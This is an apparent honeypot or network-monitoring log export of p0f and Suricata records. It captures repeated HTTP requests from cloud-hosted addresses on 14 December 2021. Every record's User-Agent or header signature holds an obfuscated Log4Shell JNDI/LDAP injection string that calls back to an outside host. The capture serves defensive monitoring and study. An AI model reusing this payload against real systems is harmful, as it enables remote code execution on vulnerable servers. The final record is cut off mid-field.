"2021-12-14T18:45:46.000Z",1,p2tDun0B6VkG8jKz1rOf,"logstash-p0f-2021.12.14",,"_doc","b55c319f-d497-4e11-a3d1-eb9acc789f3f",23609855f490,"5bfb62de-ba7c-4692-91da-a925d8909925",23609855f490,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"165.227.24.81","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,23609855f490,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",27889969,,"{""timestamp"": ""2021/12/14 18:45:46"", ""mod"": ""http request"", ""client_ip"": ""165.227.24.81"", ""server_ip"": ""172.16.0.42"", ""client_port"": 35854, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"165.227.24.81",35854,,,,,,,,,,,cli,forthcomingvirtue,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T18:45:46.000Z",1,sWtDun0B6VkG8jKz1rOf,"logstash-p0f-2021.12.14",,"_doc","b55c319f-d497-4e11-a3d1-eb9acc789f3f",23609855f490,"5bfb62de-ba7c-4692-91da-a925d8909925",23609855f490,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"165.227.24.81","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,23609855f490,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",27892922,,"{""timestamp"": ""2021/12/14 18:45:46"", ""mod"": ""http request"", ""client_ip"": ""165.227.24.81"", ""server_ip"": ""172.16.0.42"", ""client_port"": 35868, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"165.227.24.81",35868,,,,,,,,,,,cli,forthcomingvirtue,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T18:14:44.661Z",1,8monun0B6VkG8jKzfd7e,"logstash-suricata-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1929350296646671,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.68.247.241","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,119980f12f89,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/favicon.ico",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",44140566,,"{""timestamp"":""2021-12-14T18:14:44.661744+0000"",""flow_id"":1929350296646671,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.68.247.241"",""src_port"":40498,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/favicon.ico"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.68.247.241",40498,,,,,,,,,,,,rawcoast,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T18:14:44.661744+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T18:14:44.337Z",1,8Wonun0B6VkG8jKzfd7e,"logstash-suricata-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1916684438094602,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.68.247.241","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,119980f12f89,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",44140065,,"{""timestamp"":""2021-12-14T18:14:44.337157+0000"",""flow_id"":1916684438094602,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.68.247.241"",""src_port"":40470,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.68.247.241",40470,,,,,,,,,,,,rawcoast,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T18:14:44.337157+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T18:14:44.000Z",1,"_Gonun0B6VkG8jKzfd7q","logstash-p0f-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.68.247.241","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,119980f12f89,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",50142878,,"{""timestamp"": ""2021/12/14 18:14:44"", ""mod"": ""http request"", ""client_ip"": ""138.68.247.241"", ""server_ip"": ""172.16.0.42"", ""client_port"": 40470, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"138.68.247.241",40470,,,,,,,,,,,cli,rawcoast,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T18:14:44.000Z",1,"BWonun0B6VkG8jKzfd_q","logstash-p0f-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.68.247.241","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,119980f12f89,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",50145437,,"{""timestamp"": ""2021/12/14 18:14:44"", ""mod"": ""http request"", ""client_ip"": ""138.68.247.241"", ""server_ip"": ""172.16.0.42"", ""client_port"": 40498, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"138.68.247.241",40498,,,,,,,,,,,cli,rawcoast,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T16:22:23.605Z",1,hwTAuX0B5e7x5EYnltuI,"logstash-suricata-2021.12.14",,"_doc","a1b16e93-b602-4efc-bdc1-c18d0fa28474",fb3aba9b7676,"608b10a3-9277-4160-b2b2-0f0968f755ef",fb3aba9b7676,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,965563488612979,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.68.40.190","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,fb3aba9b7676,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/favicon.ico",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",38908900,,"{""timestamp"":""2021-12-14T16:22:23.605490+0000"",""flow_id"":965563488612979,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.68.40.190"",""src_port"":54328,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/favicon.ico"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.68.40.190",54328,,,,,,,,,,,,fortunateworkhorse,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T16:22:23.605490+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T16:22:23.272Z",1,"EmfAuX0B6VkG8jKzlrA-","logstash-suricata-2021.12.14",,"_doc","a1b16e93-b602-4efc-bdc1-c18d0fa28474",fb3aba9b7676,"608b10a3-9277-4160-b2b2-0f0968f755ef",fb3aba9b7676,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,418092597248916,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.68.40.190","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,fb3aba9b7676,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",38908403,,"{""timestamp"":""2021-12-14T16:22:23.272673+0000"",""flow_id"":418092597248916,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.68.40.190"",""src_port"":54306,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.68.40.190",54306,,,,,,,,,,,,fortunateworkhorse,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T16:22:23.272673+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T16:22:23.000Z",1,75nAuX0BCXMCNTQLpFyN,"logstash-p0f-2021.12.14",,"_doc","a1b16e93-b602-4efc-bdc1-c18d0fa28474",fb3aba9b7676,"608b10a3-9277-4160-b2b2-0f0968f755ef",fb3aba9b7676,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.68.40.190","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,fb3aba9b7676,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",29823451,,"{""timestamp"": ""2021/12/14 16:22:23"", ""mod"": ""http request"", ""client_ip"": ""138.68.40.190"", ""server_ip"": ""172.16.0.42"", ""client_port"": 54328, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"138.68.40.190",54328,,,,,,,,,,,cli,fortunateworkhorse,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T16:22:23.000Z",1,AQTAuX0B5e7x5EYnpNyL,"logstash-p0f-2021.12.14",,"_doc","a1b16e93-b602-4efc-bdc1-c18d0fa28474",fb3aba9b7676,"608b10a3-9277-4160-b2b2-0f0968f755ef",fb3aba9b7676,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.68.40.190","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,fb3aba9b7676,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",29820909,,"{""timestamp"": ""2021/12/14 16:22:23"", ""mod"": ""http request"", ""client_ip"": ""138.68.40.190"", ""server_ip"": ""172.16.0.42"", ""client_port"": 54306, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"138.68.40.190",54306,,,,,,,,,,,cli,fortunateworkhorse,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T12:29:16.980Z",1,v17ruH0B6VkG8jKzKd8Q,"logstash-suricata-2021.12.14",,"_doc","dfa2c178-786c-4ced-bbbc-465e77ee293e",9efcf0b4b5ab,"95bde17c-aaff-4b19-aecb-c6aaa0dfa041",9efcf0b4b5ab,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1016200236432463,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.135.145","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,9efcf0b4b5ab,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/favicon.ico",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",32710140,,"{""timestamp"":""2021-12-14T12:29:16.980970+0000"",""flow_id"":1016200236432463,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.197.135.145"",""src_port"":43556,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/favicon.ico"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.197.135.145",43556,,,,,,,,,,,,satisfiedweakness,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T12:29:16.980970+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T12:29:16.782Z",1,eF7ruH0B6VkG8jKzJd8Z,"logstash-suricata-2021.12.14",,"_doc","dfa2c178-786c-4ced-bbbc-465e77ee293e",9efcf0b4b5ab,"95bde17c-aaff-4b19-aecb-c6aaa0dfa041",9efcf0b4b5ab,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,100036467552814,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.135.145","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,9efcf0b4b5ab,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",32709214,,"{""timestamp"":""2021-12-14T12:29:16.782872+0000"",""flow_id"":100036467552814,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.197.135.145"",""src_port"":43538,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.197.135.145",43538,,,,,,,,,,,,satisfiedweakness,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T12:29:16.782872+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T12:29:16.000Z",1,lV7ruH0B6VkG8jKzJd8q,"logstash-p0f-2021.12.14",,"_doc","dfa2c178-786c-4ced-bbbc-465e77ee293e",9efcf0b4b5ab,"95bde17c-aaff-4b19-aecb-c6aaa0dfa041",9efcf0b4b5ab,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.135.145","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,9efcf0b4b5ab,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",36568542,,"{""timestamp"": ""2021/12/14 12:29:16"", ""mod"": ""http request"", ""client_ip"": ""138.197.135.145"", ""server_ip"": ""172.16.0.42"", ""client_port"": 43538, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"138.197.135.145",43538,,,,,,,,,,,cli,satisfiedweakness,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T12:29:16.000Z",1,o17ruH0B6VkG8jKzJd8q,"logstash-p0f-2021.12.14",,"_doc","dfa2c178-786c-4ced-bbbc-465e77ee293e",9efcf0b4b5ab,"95bde17c-aaff-4b19-aecb-c6aaa0dfa041",9efcf0b4b5ab,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.135.145","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,9efcf0b4b5ab,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",36572340,,"{""timestamp"": ""2021/12/14 12:29:16"", ""mod"": ""http request"", ""client_ip"": ""138.197.135.145"", ""server_ip"": ""172.16.0.42"", ""client_port"": 43556, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"138.197.135.145",43556,,,,,,,,,,,cli,satisfiedweakness,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T11:58:03.741Z",1,TfvOuH0B5e7x5EYnkw6f,"logstash-suricata-2021.12.14",,"_doc","41f5ce73-e4e6-402f-bd92-414128b3d431",5a16b4616656,"821eb7a4-bb66-44ba-8f2f-a12f3c9bbe10",5a16b4616656,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,884778409390888,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.68.246.18","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,5a16b4616656,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/favicon.ico",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",26339116,,"{""timestamp"":""2021-12-14T11:58:03.741094+0000"",""flow_id"":884778409390888,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.68.246.18"",""src_port"":57894,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/favicon.ico"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.68.246.18",57894,,,,,,,,,,,,doubletomato,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T11:58:03.741094+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T11:58:03.321Z",1,"S_vOuH0B5e7x5EYnkw6b","logstash-suricata-2021.12.14",,"_doc","41f5ce73-e4e6-402f-bd92-414128b3d431",5a16b4616656,"821eb7a4-bb66-44ba-8f2f-a12f3c9bbe10",5a16b4616656,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1253204998859741,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.68.246.18","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,5a16b4616656,"gzip, 